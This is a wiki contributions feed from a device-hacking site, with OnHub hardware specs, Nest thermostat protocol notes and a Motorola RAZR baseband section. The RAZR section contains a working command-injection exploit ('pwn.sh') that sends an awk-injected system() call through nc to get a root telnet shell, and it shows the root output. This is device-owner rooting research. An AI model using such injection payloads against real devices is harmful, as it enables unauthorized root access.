Exploitee.rs - User contributions [en]

Google OnHub (TP-Link)

2015-10-08T02:09:21Z

Mbm:

[[File:OnHub_blue.png|200px|thumb]]

==Information==
* '''Name:''' Google OnHub
* '''Manufacturer:''' TP-Link
* '''Firmware Version:''' 7077.122.4
* '''Project code name:''' Whirlwind
* '''Board name:''' whirlwind
* '''Base board:''' storm

The router runs a version of ChromeOS.

==Hardware Specs==
* WiSoC – Qualcomm Atheros IPQ8064 dual core Krait processor @ 1.4 GHz
* System Memory – 1GB DDR3L
* Storage – 4GB eMMC, 8MB NOR flash
* Connectivity
** 802.11 b/g/n 3×3 with smart antenna
** 802.11 a/n/ac 3×3 with smart antenna
** AUX wireless (802.11 a/b/g/n/ac 1×1)
** 10/100/1000M Mbps WAN and LAN port (QCA9337 Gigabit switch)
** Compatible with Zigbee/Thread , Bluetooth 4.0
** Wireless Security – WPA2-PSK
** 13 antennas in total
** Supports up to 128 devices over WiFi
* USB – 1x USB 3.0
* Audio – 3W Speaker
* Security – Infineon SLB 9615 Trusted Platform Module
* Misc – 6x tri-color array LEDs, ambient light sensor
* Power Supply – 12V/3A DC, 100-240V 50-60Hz AC
* Dimensions – 19.05 cm (H) x 11.68 cm (⌀)
* Weight – 860 grams

===Board Chipset===
* Qualcomm Atheros IPQ8064 Internet Processor with 2 Krait 300 CPUs clocked at 1.4 GHz
* Micron MT41K256M16HA 4 Gb DDR3L SDRAM
* Qualcomm Atheros QCA8337
* Qualcomm Atheros QCA9882
* Qualcomm Atheros QCA9880
* Silicon Labs EM3581 SOC network co-processor for ZigBee
* Skyworks 66109 2.4 GHz ZigBee/Smart Energy front-end module
* Skyworks SKY2623L 2.4 GHz WLAN power amplifier
* Skyworks SKY85405 802.11ac 5 GHz WLAN power amplifier
* Atheros 3012-BL3D Bluetooth radio
* Bluetooth antenna
* Micron MTFC4GACAAAM 4 GB NAND flash
* Micron 25Q064A 64 Mb SPI flash
* Infineon SLB9615 Trusted Platform Module

==Configuration==
For the moment it is reported that this router can only be configured from the Android or iOS "Google OnHub" application.

==Pictures==
[[File:OnHub_Colors.png|200px]] [[File:ObHub_Back.png|200px]]

===Disassembly===

[[File:Onhub-inside-01.jpg|200px]]

[[File:GoogleOnHub-Board.jpg|200px]]

==Root Access==
* [[Rooting The Google OnHub]]

==Links==

===Official Links===
* [https://on.google.com/hub/ Official WebPage]

===Community Links===
* [http://forum.xda-developers.com/onhub Google OnHub at XDADevelopers Forum]
* [https://plus.google.com/communities/105738065696386405857 Google OnHub Google+ Unofficial Community]

===Articles===
* [https://www.ifixit.com/Teardown/OnHub+Teardown/48129 iFixit OnHub Teardown]

[[Category:Wifi Router]]

Google OnHub (TP-Link)

2015-10-08T01:59:33Z

Mbm: /* Information */

[[File:OnHub_blue.png|200px|thumb]]

==Information==
* '''Name:''' Google OnHub
* '''Manufacturer:''' TP-Link
* '''Firmware Version:''' 7077.122.4
* '''Project code name:''' Whirlwind
* '''Board name:''' whirlwind
* '''Base board:''' storm

The router runs a version of ChromeOS.

==Hardware Specs==
* WiSoC – Qualcomm Atheros IPQ8064 dual core Krait processor @ 1.4 GHz
* System Memory – 1GB DDR3L
* Storage – 4GB eMMC, 8MB NOR flash
* Connectivity
** 802.11 b/g/n 3×3 with smart antenna
** 802.11 a/n/ac 3×3 with smart antenna
** AUX wireless (802.11 a/b/g/n/ac 1×1)
** 10/100/1000M Mbps WAN and LAN port (QCA9337 Gigabit switch)
** Compatible with Zigbee/Thread , Bluetooth 4.0
** Wireless Security – WPA2-PSK
** 13 antennas in total
** Supports up to 128 devices over WiFi
* USB – 1x USB 3.0
* Audio – 3W Speaker
* Security – Infineon SLB 9615 Trusted Platform Module
* Misc – 6x tri-color array LEDs, ambient light sensor
* Power Supply – 12V/3A DC, 100-240V 50-60Hz AC
* Dimensions – 19.05 cm (H) x 11.68 cm (⌀)
* Weight – 860 grams

===Board Chipset===
* Qualcomm Atheros IPQ8064 Internet Processor with 2 Krait 300 CPUs clocked at 1.4 GHz
* Micron MT41K256M16HA 4 Gb DDR3L SDRAM
* Qualcomm Atheros QCA8337
* Qualcomm Atheros QCA9882
* Qualcomm Atheros QCA9880
* Silicon Labs EM3581 SOC network co-processor for ZigBee
* Skyworks 66109 2.4 GHz ZigBee/Smart Energy front-end module
* Skyworks SKY2623L 2.4 GHz WLAN power amplifier
* Skyworks SKY85405 802.11ac 5 GHz WLAN power amplifier
* Atheros 3012-BL3D Bluetooth radio
* Bluetooth antenna
* Micron MTFC4GACAAAM 4 GB NAND flash
* Micron 25Q064A 64 Mb SPI flash
* Infineon SLB9615 Trusted Platform Module

==Configuration==
For the moment it is reported that this router can only be configured from the Android or iOS "Google OnHub" application.

==Pictures==
[[File:OnHub_Colors.png|200px]] [[File:ObHub_Back.png|200px]]

===Disassembly===

[[File:Onhub-inside-01.jpg|200px]]

[[File:GoogleOnHub-Board.jpg|200px]]

==Links==

===Official Links===
* [https://on.google.com/hub/ Official WebPage]

===Community Links===
* [http://forum.xda-developers.com/onhub Google OnHub at XDADevelopers Forum]
* [https://plus.google.com/communities/105738065696386405857 Google OnHub Google+ Unofficial Community]

===Articles===
* [https://www.ifixit.com/Teardown/OnHub+Teardown/48129 iFixit OnHub Teardown]

[[Category:Wifi Router]]

Moto RAZR, BIONIC, DROID 4

2014-08-09T07:41:55Z

Mbm:

__FORCETOC__
{{Disclaimer}}
[[File:Razr.png|200px|left|thumb]]
[[Category:Phones]]
This page will be dedicated to a general overview, descriptions, and information related to the Motorola Droid RAZR.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/dp/B008XLJ22A/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=dp/B008XLJ22A&linkCode=as2&tag=gtvcom-20&linkId=MMQVXJLSRHPLTJGI Purchase the Motorola Droid RAZR at Amazon]

== Exploitation ==

Android communicates with the baseband over an internal USB network

192.168.157.1 (Android) <- usb network -> 192.168.157.2 (LTE)
usb1 Link encap:Ethernet HWaddr 02:21:00:1D:34:FB
inet addr:192.168.157.1 Bcast:192.168.157.7 Mask:255.255.255.248
inet6 addr: fe80::21:ff:fe1d:34fb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:916 errors:0 dropped:0 overruns:0 frame:0
TX packets:910 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:337347 (329.4 KiB) TX bytes:63269 (61.7 KiB)

Included in the Android filesystem is a /system/bin/wrigley-dump.sh which demonstrates usage:
...
for cmd in "state" "logs" "files" "panic" "atvc"; do
echo "-o wrigley $cmd" | nc -w 10 192.168.157.2 3002
done

Port 3002 redirects to a shell script running as root:
...
dumpBinFile()
local inFilePath="$1"
local outFilePath="$2"
case $(echo | busybox awk '{print substr("'"${outFilePath}"'",0,1)}') in
"/") ;;
*) outFilePath="/$outFilePath"
esac
...

Note the strange filename parsing using awk.

In addition to port 3002 there's also a limited shell running on port 3023.

'''pwn.sh''':
echo "\ntouch '/pds/public/x\",0,1);system(\"start\${IFS}adbd;start\${IFS}telnetd-root\");(\"'\nexit" | nc 192.168.157.2 3023
echo "files" | nc 192.168.157.2 3002 > /dev/null
adb pull /system/xbin/telnet /data/local/tmp/telnet
chmod 755 /data/local/tmp/telnet
/data/local/tmp/telnet 192.168.157.2

Output:

Entering character mode
Escape character is '^]'.

root@(unknown):/#
root@(unknown):/# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 189.57
Features : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5

Hardware : Wrigley 3G DatacardLTE
Revision : 0000
Serial : 0000000000000000
root@(unknown):/# whoami
root

Nest Hacking

2014-06-29T18:40:11Z

Mbm: /* Backplane to display */

== Info ==
* /dev/event1 is the knob; /dev/event2 is the button

== Nest software ==
/nestlabs/sbin/nlclient -config /nestlabs/etc/client.config -config /nestlabs/etc/Display/Display-2/client.config

=== Backplate firmware ===
Found in /nestlabs/share/bp/data/firmware/nlbpfirmware.plist

== Nest backplate interface ==
* Connected on /dev/ttyO2
* All communications with backplane begin with (d5)d5aa96 (d5 is doubled only for data FROM backplane)
* Everything is little endian
* 16-bit command
* 16-bit data length
* <data>
* 16-bit checksum

Monitor:
strace -ff -p $(pidof nlclient) -x -s9999 -e read,write 2>&1 | grep '(54'

=== Checksum ===
<Bytes-from-end>.<bit-value> <xor-with>
00.01 2110 (1021)
00.02 4220 (2042: 1021<<1)
00.04 8440 (4084: 2048<<1)
00.08 0881 (8108: 4084<<1)
00.10 3112 (1231: 8108<<1^1021)
00.20 6224 (2462: 1231<<1)
00.40 c448 (48c4: 2462<<1)
00.80 8891 (9188: 48c4<<1)
01.01 3133 (3313: 9188<<1^1021)
01.02 6266
01.04 c4cc
01.08 a989
01.10 7303
01.20 e606
01.40 cc0d
01.80 981b
02.01 3037
02.02 606e
...
03.01 b476
03.02 68ed
03.04 f1ca
03.08 c385
03.10 a71b
03.20 4e37
03.40 9c6e
03.80 38dd
...
07.20 687b

If you compute the contribution of the individual bit changes in the data you end up with the xor table above; byte offset from the end of the data, bit pattern, xor value. Correcting for little endianess in the output you end up with the hex values in parenthesis. The least significant bit is 0x1021 and each subsequent bit is a shift left, if the XOR value has the 0x8000 bit set then it is XORed with 0x1021. This is the CRC-CCITT polynomial.

8 7 6 5 4 3 2 1 0
d5 aa 96 82 00 02 00 00 00: 08b2
|| |
|| 68ed
|408b
20d4

08b2: 68ed ^ 408b ^ 20d4

Starting at the least significant bit and filling in the XOR values for each bit gives the above diagram; the diagram stops at the 20d4 XOR value because at that point it matches the final CRC. This tells us that the CRC covers the 6 bytes prior.

#!/usr/bin/env perl
use Digest::CRC qw(crc);
my $data = pack("H*", "820002000000");
printf("%04x\n", crc($data,16,0,0,0,0x1021,0,0));

We can also compute the same CRC in Perl; note the result will be byte swapped since the data encodes the number as little endian.

=== Command ids ===

==== Display to backplane ====
[[#FET control|0082 - FET control]]
0083 - (every 30 seconds; no data)
[[#FET presence|008f - FET presence]]
0090 - (no data)
0098 - (no data)
0099 - (no data)
009b - (no data)
009c - (no data)
009d - (no data)
009e - (no data)
009f - (no data)
00a1 - (16-bit data)
00a2 - (every 30 seconds; no data)
00a3 - (every 30 seconds; no data)
00a4 - (16-bit data)
00b1 - button pressed/unpressed (no data)
00b3 - (32-bit data; always ffffffff?)
00b5 - (16-bit data; always 0f00?)
00b9 - (32-bit data; always 0000ffff?)
00ba - (48-bit data; always 000000000000?)
00c2 - (48-bit data)
00ff - (no data)

==== Backplane to display ====
0001 - (message from backplane; ascii)
[[#Temperature reading|0002 - Temperature reading (twice every 30 seconds; 32-bit data)]]
[[#FET presence|0004 - FET presence]]
0005 - (32-bit data)
0007 - (every second; 16-bit data)
[[#FET presence|0009 - FET presence]]
000a - (every second; 16-bit data)
000b - (backplane state)
000c - (16-bit values: pir, px1, px1 divisor, px2, px2 divisor, alir, av)
0010 - (24-bit data)
0014 - (16-bit data)
0018 - (48-bit data)
0019 - (52-BYTE data)
001b - (24-bit data)
001c - (24-bit data)
001d - (16-bit data)
001e - (13-BYTE data)
001f - (128-bit data)
0022 - (every 30 seconds; 4, 8, 20, 28, 36, 56, 60, 54, 68, 72, or 176 byte data)
0023 - (6, 12, 30, 42, 54, 78, 84, 90, 96, 102, 108, 144, or 150 byte data)
0025 - (2, 4, 12, 14, 20, or 24 byte data)
0027 - (8, 16, 48, 56, 80, or 96 byte data)
0029 - (6, 12, 36, 42, 60, or 72 byte data)
002b - (8, 16, 24, 32, 40, 128, or 152 byte data)
002f - (every 30 seconds; 16-bit data)

=== FET control ===
Turn on W1: d5aa96 8200 0200 00 01 29a2
Turn off W1: d5aa96 8200 0200 00 00 08b2
Turn on Y1: d5aa96 8200 0200 01 01 1891
Turn off Y1: d5aa96 8200 0200 01 00 3981
Turn on G : d5aa96 8200 0200 02 01 4bc4
Turn off G : d5aa96 8200 0200 02 00 6ad4
Turn on OB: d5aa96 8200 0200 03 01 7af7
Turn off OB: d5aa96 8200 0200 03 00 5be7
Turn on W2: d5aa96 8200 0200 04 01 ed6e
Turn off W2: d5aa96 8200 0200 04 00 cc7e
Turn on Y2: d5aa96 8200 0200 07 01 be3b
Turn off Y2: d5aa96 8200 0200 07 00 9f2b
Turn on * : d5aa96 8200 0200 0b 01 d37e
Turn off * : d5aa96 8200 0200 0b 00 f26e

For the sake of documentation, we will refer to the unique id numbers for each wire as "wire id numbers".
So wire id 0 is W1, wire id 1 is Y1, wire id B is *, etc.

=== FET presence ===
The backplate will, at least upon connection, send information about which FETs have a wire present.
This data is received with command ids 0004 and 0009, in that order.
Each sensor is represented by one byte which is either 00 (not present) or 01 (present).

The content of 0004 is in order of the "wire id numbers" used for control:
W1, Y1, G, OB, W2, ?0, ?0, Y2, ?1, ?1, ?0, *, ?0

The content of 0009 is arranged differently and has 2 more values:
W1, Y1, ?1, ?1, ?0, G, OB, W2, ?0, Y2, ?0, *, ?0, ?0, ?0

After these are received, the display sends back command 008f with the exact data of 0004.

=== Temperature reading ===
The backplate will send message 0002 every 30 seconds.
The data contains two 16-bit numbers, which nlclient logs in decimal.
The first number is the temperature in centi-celcius.
The second number is the humidity in per-millis.

== Run BeagleBone/Debian programs ==
ln -s . /lib/arm-linux-gnueabihf
ln -s ld-2.11.1.so /lib/ld-linux-armhf.so.3

Nest Hacking

2014-06-29T18:27:53Z

Mbm: /* Backplane to display */

== Info ==
* /dev/event1 is the knob; /dev/event2 is the button

== Nest software ==
/nestlabs/sbin/nlclient -config /nestlabs/etc/client.config -config /nestlabs/etc/Display/Display-2/client.config

=== Backplate firmware ===
Found in /nestlabs/share/bp/data/firmware/nlbpfirmware.plist

== Nest backplate interface ==
* Connected on /dev/ttyO2
* All communications with backplane begin with (d5)d5aa96 (d5 is doubled only for data FROM backplane)
* Everything is little endian
* 16-bit command
* 16-bit data length
* <data>
* 16-bit checksum

Monitor:
strace -ff -p $(pidof nlclient) -x -s9999 -e read,write 2>&1 | grep '(54'

=== Checksum ===
<Bytes-from-end>.<bit-value> <xor-with>
00.01 2110 (1021)
00.02 4220 (2042: 1021<<1)
00.04 8440 (4084: 2048<<1)
00.08 0881 (8108: 4084<<1)
00.10 3112 (1231: 8108<<1^1021)
00.20 6224 (2462: 1231<<1)
00.40 c448 (48c4: 2462<<1)
00.80 8891 (9188: 48c4<<1)
01.01 3133 (3313: 9188<<1^1021)
01.02 6266
01.04 c4cc
01.08 a989
01.10 7303
01.20 e606
01.40 cc0d
01.80 981b
02.01 3037
02.02 606e
...
03.01 b476
03.02 68ed
03.04 f1ca
03.08 c385
03.10 a71b
03.20 4e37
03.40 9c6e
03.80 38dd
...
07.20 687b

If you compute the contribution of the individual bit changes in the data you end up with the xor table above; byte offset from the end of the data, bit pattern, xor value. Correcting for little endianess in the output you end up with the hex values in parenthesis. The least significant bit is 0x1021 and each subsequent bit is a shift left, if the XOR value has the 0x8000 bit set then it is XORed with 0x1021. This is the CRC-CCITT polynomial.

8 7 6 5 4 3 2 1 0
d5 aa 96 82 00 02 00 00 00: 08b2
|| |
|| 68ed
|408b
20d4

08b2: 68ed ^ 408b ^ 20d4

Starting at the least significant bit and filling in the XOR values for each bit gives the above diagram; the diagram stops at the 20d4 XOR value because at that point it matches the final CRC. This tells us that the CRC covers the 6 bytes prior.

#!/usr/bin/env perl
use Digest::CRC qw(crc);
my $data = pack("H*", "820002000000");
printf("%04x\n", crc($data,16,0,0,0,0x1021,0,0));

We can also compute the same CRC in Perl; note the result will be byte swapped since the data encodes the number as little endian.

=== Command ids ===

==== Display to backplane ====
[[#FET control|0082 - FET control]]
0083 - (every 30 seconds; no data)
[[#FET presence|008f - FET presence]]
0090 - (no data)
0098 - (no data)
0099 - (no data)
009b - (no data)
009c - (no data)
009d - (no data)
009e - (no data)
009f - (no data)
00a1 - (16-bit data)
00a2 - (every 30 seconds; no data)
00a3 - (every 30 seconds; no data)
00a4 - (16-bit data)
00b1 - button pressed/unpressed (no data)
00b3 - (32-bit data; always ffffffff?)
00b5 - (16-bit data; always 0f00?)
00b9 - (32-bit data; always 0000ffff?)
00ba - (48-bit data; always 000000000000?)
00c2 - (48-bit data)
00ff - (no data)

==== Backplane to display ====
0001 - (message from backplane; ascii)
[[#Temperature reading|0002 - Temperature reading (twice every 30 seconds; 32-bit data)]]
[[#FET presence|0004 - FET presence]]
0005 - (32-bit data)
0007 - (every second; 16-bit data)
[[#FET presence|0009 - FET presence]]
000a - (every second; 16-bit data)
000b - (backplane state)
000c - (every 30 seconds; 112-bit data)
0010 - (24-bit data)
0014 - (16-bit data)
0018 - (48-bit data)
0019 - (52-BYTE data)
001b - (24-bit data)
001c - (24-bit data)
001d - (16-bit data)
001e - (13-BYTE data)
001f - (128-bit data)
0022 - (every 30 seconds; 4, 8, 20, 28, 36, 56, 60, 54, 68, 72, or 176 byte data)
0023 - (6, 12, 30, 42, 54, 78, 84, 90, 96, 102, 108, 144, or 150 byte data)
0025 - (2, 4, 12, 14, 20, or 24 byte data)
0027 - (8, 16, 48, 56, 80, or 96 byte data)
0029 - (6, 12, 36, 42, 60, or 72 byte data)
002b - (8, 16, 24, 32, 40, 128, or 152 byte data)
002f - (every 30 seconds; 16-bit data)

=== FET control ===
Turn on W1: d5aa96 8200 0200 00 01 29a2
Turn off W1: d5aa96 8200 0200 00 00 08b2
Turn on Y1: d5aa96 8200 0200 01 01 1891
Turn off Y1: d5aa96 8200 0200 01 00 3981
Turn on G : d5aa96 8200 0200 02 01 4bc4
Turn off G : d5aa96 8200 0200 02 00 6ad4
Turn on OB: d5aa96 8200 0200 03 01 7af7
Turn off OB: d5aa96 8200 0200 03 00 5be7
Turn on W2: d5aa96 8200 0200 04 01 ed6e
Turn off W2: d5aa96 8200 0200 04 00 cc7e
Turn on Y2: d5aa96 8200 0200 07 01 be3b
Turn off Y2: d5aa96 8200 0200 07 00 9f2b
Turn on * : d5aa96 8200 0200 0b 01 d37e
Turn off * : d5aa96 8200 0200 0b 00 f26e

For the sake of documentation, we will refer to the unique id numbers for each wire as "wire id numbers".
So wire id 0 is W1, wire id 1 is Y1, wire id B is *, etc.

=== FET presence ===
The backplate will, at least upon connection, send information about which FETs have a wire present.
This data is received with command ids 0004 and 0009, in that order.
Each sensor is represented by one byte which is either 00 (not present) or 01 (present).

The content of 0004 is in order of the "wire id numbers" used for control:
W1, Y1, G, OB, W2, ?0, ?0, Y2, ?1, ?1, ?0, *, ?0

The content of 0009 is arranged differently and has 2 more values:
W1, Y1, ?1, ?1, ?0, G, OB, W2, ?0, Y2, ?0, *, ?0, ?0, ?0

After these are received, the display sends back command 008f with the exact data of 0004.

=== Temperature reading ===
The backplate will send message 0002 every 30 seconds.
The data contains two 16-bit numbers, which nlclient logs in decimal.
The first number is the temperature in centi-celcius.
The second number is the humidity in per-millis.

== Run BeagleBone/Debian programs ==
ln -s . /lib/arm-linux-gnueabihf
ln -s ld-2.11.1.so /lib/ld-linux-armhf.so.3

Nest Hacking

2014-06-29T09:22:09Z

Mbm: /* Checksum */

== Info ==
* /dev/event1 is the knob; /dev/event2 is the button

== Nest software ==
/nestlabs/sbin/nlclient -config /nestlabs/etc/client.config -config /nestlabs/etc/Display/Display-2/client.config

== Nest backplate interface ==
* Connected on /dev/ttyO2
Turn on W1: d5aa96 8200 0200 00 01 29a2
Turn off W1: d5aa96 8200 0200 00 00 08b2
Turn on Y1: d5aa96 8200 0200 01 01 1891
Turn off Y1: d5aa96 8200 0200 01 00 3981
Turn on G : d5aa96 8200 0200 02 01 4bc4
Turn off G : d5aa96 8200 0200 02 00 6ad4
Turn on OB: d5aa96 8200 0200 03 01 7af7
Turn off OB: d5aa96 8200 0200 03 00 5be7
Turn on W2: d5aa96 8200 0200 04 01 ed6e
Turn off W2: d5aa96 8200 0200 04 00 cc7e
Turn on Y2: d5aa96 8200 0200 07 01 be3b
Turn off Y2: d5aa96 8200 0200 07 00 9f2b
Turn on * : d5aa96 8200 0200 0b 01 d37e
Turn off * : d5aa96 8200 0200 0b 00 f26e

* All communications with backplane begin with (d5)d5aa96 (d5 is doubled only for data FROM backplane)
* 16-bit command
* 16-bit data length
* <data>
* 16-bit checksum

Monitor:
strace -ff -p $(pidof nlclient) -x -s9999 -e read,write 2>&1 | grep '(54'

=== Checksum ===
<Bytes-from-end>.<bit-value> <xor-with>
00.01 2110 (1021)
00.02 4220 (2042: 1021<<1)
00.04 8440 (4084: 2048<<1)
00.08 0881 (8108: 4084<<1)
00.10 3112 (1231: 8108<<1^1021)
00.20 6224 (2462: 1231<<1)
00.40 c448 (48c4: 2462<<1)
00.80 8891 (9188: 48c4<<1)
01.01 3133 (3313: 9188<<1^1021)
01.02 6266
01.04 c4cc
01.08 a989
01.10 7303
01.20 e606
01.40 cc0d
01.80 981b
02.01 3037
02.02 606e
...
03.01 b476
03.02 68ed
03.04 f1ca
03.08 c385
03.10 a71b
03.20 4e37
03.40 9c6e
03.80 38dd
...
07.20 687b

If you compute the contribution of the individual bit changes in the data you end up with the xor table above; byte offset from the end of the data, bit pattern, xor value. Correcting for little endianess in the output you end up with the hex values in parenthesis. The least significant bit is 0x1021 and each subsequent bit is a shift left, if the XOR value has the 0x8000 bit set then it is XORed with 0x1021. This is the CRC-CCITT polynomial.

8 7 6 5 4 3 2 1 0
d5 aa 96 82 00 02 00 00 00: 08b2
|| |
|| 68ed
|408b
20d4

08b2: 68ed ^ 408b ^ 20d4

Starting at the least significant bit and filling in the XOR values for each bit gives the above diagram; the diagram stops at the 20d4 XOR value because at that point it matches the final CRC. This tells us that the CRC covers the 6 bytes prior.

#!/usr/bin/env perl
use Digest::CRC qw(crc);
my $data = pack("H*", "820002000000");
printf("%04x\n", crc($data,16,0,0,0,0x1021,0,0));

We can also compute the same CRC in Perl; note the result will be byte swapped since the data encodes the number as little endian.

== Run BeagleBone/Debian programs ==
ln -s . /lib/arm-linux-gnueabihf
ln -s ld-2.11.1.so /lib/ld-linux-armhf.so.3